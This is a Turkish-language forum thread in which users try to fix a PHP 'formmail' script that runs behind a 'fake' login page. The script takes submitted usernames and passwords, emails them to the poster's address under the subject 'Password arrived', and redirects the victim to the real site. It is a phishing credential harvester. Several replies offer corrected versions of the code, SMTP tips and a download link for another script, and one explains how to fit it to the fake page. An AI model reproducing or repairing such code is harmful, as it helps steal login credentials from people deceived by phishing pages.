Php Formmail Sorunu
-
Buradan bir ara birisi paylaşmıştı php formail kodlarını bugün deneyeyim dedim çalışmadı bu kodlar kodları yanlış mı aldım acaba neresinde eksiklikler var php den anlayan arkadaşlar yardımcı olursa sevinirim mail gönderimi yapmıyor
<?php
$recipient = $_POST["recipent"];
$redirect = $_POST["redirect"];
$login = $_POST["LOGIN"];
$password = $_POST["PASSWORD"];
$mesaj = "Kullanici Adi:".$login."\n\rSifre:".$password;
mail($recipient,"Sifre Geldi...",$mesaj);
header("Location: ".$redirect);
?>
Aşşağıdaki html form bilgileriyle çalıştırmam gerektiği yazıyordu aşşağıdaki kodları filan düzgün biçimde fake sayfaında düzenledim belirtilen siteye yönenme ouyor filan ama mail belirttiğim maile gelmiyor nedense<form action="http://www.***.com/formmail.php" method="post">
<input type="hidden" value="***@gmail.com" name="recipient">
<input type="Hidden" value="http://www.**.com" name=redirect>
biri bu kodların düzgününü yada bana yenibir form mail kodu verebilir mi php bu kodlar gibi verdiğim form bilgileriyle uyumlu çalışacak -
SeRDaR bunu yazdı:
-----------------------------
$recipient = $_POST["recipent"];
$redirect = $_POST["redirect"];
$login = $_POST["LOGIN"];
$password = $_POST["PASSWORD"];
$mesaj = "Kullanici Adi:".$login."\n\rSifre:".$password;
mail($recipient,"Sifre Geldi...",$mesaj);
header("Location: ".$redirect);
?>
-----------------------------$adres = $_POST['recipent'];
$konu = "Şifre Geldi";
$login = $_POST['login'];
$password = $_POST['password'];
$redirect = $_POST['redirect'];
$mesaj = "Kullanıcı adı:".$login."Şifre:".$password;
mail($adres,$konu,$mesaj);Bide bu şekilde dene.Önemsiz posta kısmına bakmayı unutma.
Birde hidden olan alanları niye post ile çekiyorsunki direk değişkenin karşılığına yazsanda olur.
-
$recipient = $_POST["recipent"];
$redirect = $_POST["redirect"];
$login = $_POST["LOGIN"];
$password = $_POST["PASSWORD"];
$mesaj = "Kullanici Adi:".$login."\n\rSifre:".$password;
mail($recipient,"Sifre Geldi...",$mesaj);
header("Location: ".$redirect);
?>mail($recipient,"Sifre Geldi...",$mesaj);
burada hata var bence
mail($recipient,$konu,$mesaj);
$konu = "Sifre Geldi";
olarak dene ? eğer mail gelmez smtp de sorun vardır
-
yok hocam 2 side olmadı :(
Host bluehosttan -
Lathedarkman bunu yazdı:
-----------------------------olarak dene ? eğer mail gelmez smtp de sorun vardır
-----------------------------benim flash uzerınde bulunan formmaılım de smtp yuzunden calısmıyor. bı turlu yapamadım. ısımtescıl host kullanıyorum. yardımın dokunurmu acaba?=
-
alternatif başka bir php formmail kodu belirtebilirmisiniz ?
-
SeRDaR bunu yazdı:
-----------------------------
alternatif başka bir php formmail kodu belirtebilirmisiniz ?
-----------------------------Buyur hocam kendine göre düzenlersin.Netten hazır aldım.
http://rapidshare.com/files/271009864/phpMailGonderme.rar.html
-
myblackworldweb bunu yazdı:
-----------------------------Lathedarkman bunu yazdı:
-----------------------------olarak dene ? eğer mail gelmez smtp de sorun vardır
-----------------------------benim flash uzerınde bulunan formmaılım de smtp yuzunden calısmıyor. bı turlu yapamadım. ısımtescıl host kullanıyorum. yardımın dokunurmu acaba?=
-----------------------------
eğer kendi makinan olmuş olsaydı sana program önerebilirdim otomatik smtp kuruyor ve sorun çıkarmıyor ama host başkasının üzerinde ise server sahibinin yapması lazım sana önereceğim programın adı mail enable programıdır ücretsiz smtp hizmeti vardır sadece programı kuruyorsun makinana ondan sonra mail() fonksiyonu sorunsuz çalışıyor mailler inboxa düşüyor.
-
Scofield bunu yazdı:
-----------------------------SeRDaR bunu yazdı:
-----------------------------
alternatif başka bir php formmail kodu belirtebilirmisiniz ?
-----------------------------Buyur hocam kendine göre düzenlersin.Netten hazır aldım.
http://rapidshare.com/files/271009864/phpMailGonderme.rar.html
-----------------------------
bunun fakeye göre uyarlanması baya zor olucak ama neyse deneyeceğiz teşekkürler
-
SeRDaR bunu yazdı:
-----------------------------
Scofield bunu yazdı:
-----------------------------SeRDaR bunu yazdı:
-----------------------------
alternatif başka bir php formmail kodu belirtebilirmisiniz ?
-----------------------------Buyur hocam kendine göre düzenlersin.Netten hazır aldım.
http://rapidshare.com/files/271009864/phpMailGonderme.rar.html
-----------------------------
bunun fakeye göre uyarlanması baya zor olucak ama neyse deneyeceğiz teşekkürler
-----------------------------Yok hocam php değişkenlerini değiştirmene gerek yok sadece html kısımından kutucukların yanındaki yazıları değiştirsen yeterli.
